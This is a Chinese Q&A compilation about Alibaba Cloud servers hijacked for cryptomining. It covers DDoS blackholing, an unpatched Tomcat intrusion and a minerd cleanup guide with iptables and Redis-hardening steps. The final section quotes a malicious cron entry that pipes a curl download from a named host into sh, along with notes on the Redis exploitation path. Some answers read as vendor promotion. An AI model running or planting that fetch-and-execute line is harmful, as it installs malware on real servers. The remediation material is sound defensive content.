阿里云服务器被黑挖矿

⑴ 服务器被下挖矿了怎么办

哥们被下了啥挖矿？去举报啊。之前流量矿石非常火的时候，我的服务器也被无良黑了，成了肉鸡，然后我去找到他的信息，截图跟流量矿石举报，就帮我处理了。你看你的被下了啥，就去找他们处理。

⑵ 阿里云服务器太不安全了，老是被攻击，工作人员就负责把服务器给我关了

阿里云提供基础设施服务，按需取用服务器资源，但是安全防御企业自身也一定要重视起来，不要以为上云了之后就绝对安全了，阿里云提供最高5g的免费防御ddos流量攻击，如果安全策略做得更高则需要购买高防ip。
你这个情况应该是受到攻击并没有更好的安全措施，当攻击达到一定程度，工作人员会将其关闭，以防遭受到更大的损失。

⑶ 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

⑷ 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的，因为没有解决好漏洞。
建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。

⑸ 黑客攻击阿里云服务器的目的

黑客攻击服务器无外乎为了钱，一但关机对其造成了影响，势必造成客户对阿里云的信任问题，造成客户流失。
同行的话，目的已经达成，如果纯粹的黑客就是为了体现自己的技术，或者为了勒索阿里云。

⑹ 阿里云买的服务器被黑了怎么办

阿里云服务器遭受大流量攻击而进入黑洞，所有来自外部的流量都会被丢弃，黑洞期间，服务器的外网访问将被屏蔽。最好的解决方法就是清洗流量，先换ip，新换的ip不要泄露出去，然后找第三方进行流量清洗，这个过程要注意硬防和只能防的区别，最好是智能防护，将流量损失降到最低！

⑺ 阿里云服务器刚买两天就被攻击当肉鸡，黑客怎么做到的

您这服务器是被黑客入侵了，被黑的因素 一般都是程序留了后门或vps内被留了系统内核级别的木马 或网站的代码留了隐蔽性的木马或一句话shell
一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了
服务器被黑是每个网站管理员最头痛的问题 也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.

⑻ 阿里云被黑能赎回吗

不能。阿里云被黑，所有来自外部的流量都会被丢弃，黑洞期间，服务器的外网访问将被屏蔽，期间无法赎回，会进入5天的等待删除期。

⑼ 阿里云服务器总是被攻击,基本上刚买就会被攻击,是为什么

归属于阿里云服务器的ip是有范围值的。
阿里属于比较大型的服务器提供商，云主机服务器租用量较大。
有可能攻击并不是针对你的，而是之前别的云主机使用了这个ip，然后退用了云主机后ip重新归属，正好被你用上了。所以就一租用就被攻击了。
服务器和网站被攻击的话，建议检查下服务器的系统日志和网站运行的日志，分析确定下是受到了什么类型的攻击，然后服务器是哪个调解下相应的安全策略来进行防御。
也可以安装安全狗之类的防护软件来进行防御。
服务器安全狗主要保护服务器免遭恶意攻击，包括DDOS、ARP防火墙、远程桌面守护、端口保护、网络监控等。
网站安全狗主要保护服务器上网站的安全，包括网马挂马扫描、SQL注入防护，CC攻击防护，资源保护等。
两者防护方向不同。建议结合使用可以让保护更全面。
在防御的同时，可以查看防护日志，了解服务器和网站受到的是什么类型的攻击，然后针对攻击类型来调节防护规则，可以更为有效地进行防御。

⑽ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.